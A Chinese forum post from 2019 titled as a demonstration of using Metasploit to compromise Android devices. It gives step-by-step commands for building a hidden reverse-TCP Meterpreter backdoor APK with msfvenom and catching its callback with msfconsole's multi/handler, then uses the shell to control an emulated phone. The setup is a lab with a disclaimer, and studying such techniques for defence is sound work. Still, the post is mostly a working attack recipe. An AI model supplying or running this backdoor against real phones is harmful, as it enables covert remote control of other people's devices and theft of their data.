动态 版块 发帖 消息 我的
Loading...
HadSky
支持原创软件,共创美好明天!
代码如风Lv1000005   
[网络攻防]演示使用Metasploit入侵安卓设备     

准备工作

1.局域网环境(192.168.124.1)

2.Kali Linux(192.168.124.8)

3.安卓手机(由于没有手机在这里使用模拟器)

安装Vmware虚拟机

网络上有教程,不在多说

下载Kali虚拟机镜像

下载地址:点我进入

下载镜像.png

在这里尽量下载OVA格式的,因为可以直接导入,在这里演示的为32位的kali linux

导入虚拟机

导入虚拟机.png

双击下载好的文件(ova格式)直接导入即可,如图所示

开机前的设置

导入好了之后需要事先设置一下,才能够开始使用,设置方法如下

1.依次点击 虚拟机 -> 设置

2.点击网络适配器

3.设置为桥接模式,设置好了如图所示

桥接.png

然后点击确定,保存设置

运行Kali

都设置好了就可以开机了,点击开启此虚拟机

默默等待开机,然后输入账号密码(默认账号:root,默认密码:toor)

开机之后点击终端,就可以开始下一步操作了

PS:终端为左侧工具栏第二个,如果找不到你可以点右上角了

制作后门

首先我们要确定自己的ip,在终端中输入下面的指令即可

ifconfig

内网ip.png

可以看到我们的内网ip是192.168.124.8,证明刚刚设置的桥接已经成功的让我们的kali融入了我们的局域网环境

然后就是制作后门了,在终端输入以下指令,然后回车


msfvenom -p android/meterpreter/reverse_tcp LHOST=内网ip LPORT=监听端口 > 生成的文件名


PS:指令自行替换,文件名必须以.apk结尾,然后监听端口建议为443

生成完毕.png

如图所示,即为成功了,然后就可以放到手机里面去安装了

安装

由于没有手机,在这里用模拟器来演示

我已经把后门转移到了安卓模拟器里面,至于方法还是开动你的脑子吧

安装包.png

我们可以看到,这个12kb的安装包需要的权限还是比较多的,然后安装

安装好了之后,打开

没反应?其实不然,这个后门没有任何界面,直接后台运行,下面开始教如何启动这个后门

启动后门

还是利用kali的终端,依次输入下方的指令

msfconsole然后等待下方的界面出现,等待的时间有点长启动后门.png出现了之后依次执行下面的指令

msf > use exploit/multi/handler 

      > set payload android/meterpreter/reverse_tcp 

      > set lhost 内网ip > set lport 监听端口 

      > exploit

这里设置的需要和后门那里一样,执行最后一个代码之后就可以在模拟器(手机)里面运行后门 然后终端这里就会有反应,之后就可以利用终端来控制手机了橙光.png输入help可以查看帮助,这里帮大家汉化了一下常用的指令最后.png


 0  已被阅读了80次  楼主 2019-08-31 21:27:29
回复列表

回复:[网络攻防]演示使用Metasploit入侵安卓设备

guest
登录之后更精彩~
Powered by HadSky 7.3.3
© 2015-2019 PuYueTian
您的IP:3.227.2.109,2019-10-18 12:52:05,Processed in 0.05219 second(s).
Powered by HadSky
本站技术仅供学习,抵制违法使用,共建绿色互联网!